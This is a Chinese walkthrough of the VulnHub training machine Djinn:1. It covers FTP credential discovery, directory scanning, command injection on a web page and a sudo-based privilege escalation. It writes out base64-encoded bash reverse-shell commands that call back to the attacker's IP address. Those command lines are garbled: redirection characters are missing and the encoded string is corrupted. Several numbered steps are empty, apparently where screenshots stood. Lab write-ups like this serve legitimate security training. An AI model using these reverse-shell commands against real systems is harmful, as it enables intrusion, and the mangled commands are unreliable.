Djinn:1
一、靶机描述及下载地址虚拟机下载地址https://www.vulnhub.com/entry/djinn-1,397/虚拟机简介None目标user.txt和root.txt级别中级二、安装信息下载到的镜像文件直接导入VM即可需要注意的是默认网卡是桥接模式如果想用NAT模式的话直接改一下即可三、详细渗透测试过程1.主机发现因为kali也是NAT模式并且IP地址是192.168.229.1402.直接使用fscan进行探测kali的IP地址是:192.168.229.140目标靶机的IP地址是192.168.229.1503.直接来看ftp的匿名登录4.下载文件5.查看文件内容creds.txtnitu:81299game.trxt文件内容为oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to thefinal level and get the prize.根据提示信息1337端口搭建了一个游戏如果我能到最后一关并且得到prize(奖励奖品)Message.txtnitish81299 I am going on holidays for few days, please take care of all the work.And don’t mess up anything.6.全端口扫描7.先看web服务8.查看页面源代码没发现特别9.目录扫描找后台10.根据AI提示信息11.直接使用nc进行连接12.这里试了好久没出来其实是卡在这里一步的信息收集的不够目录扫描字典太小啦gobuster dir -u http://192.168.229.150:7331 -w /usr/share/wordlists/dirb/big.txthttp://192.168.229.150:7331/genie13.直接可以命令执行http://192.168.229.150:7331/wish14.可以直接命令执行那么直接反弹shell没反弹成功,中途踩了好多的坑只有以下方式可以如果还有其他姿势欢迎大佬斧正echo bash -i /dev/tcp/192.168.207.130/5555 01 | base64echo bash -i /dev/tcp/192.168.229.140/5566 01 | base64echo YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xNDAvNTU2NiAwPiYxCg | base64 -d | bash成功反弹shell15.AI的思路16.AI差一点这道题目最后的提权是通过shell界面切换至nitish用户通过sudo -l17.最让人迷的是最后猜数字输入num竟然提权成功四、总结1.信息收集的能力有待提高目录字典的大小还是能看我是否进一步攻击2.涉及到的提权信息注意切换用户后在提权www-data目录下没得权限3.交换式shell的熟练使用4.注意反弹shell的过程中可以直接使用前台去尝试发包的话需要注意编码空格问题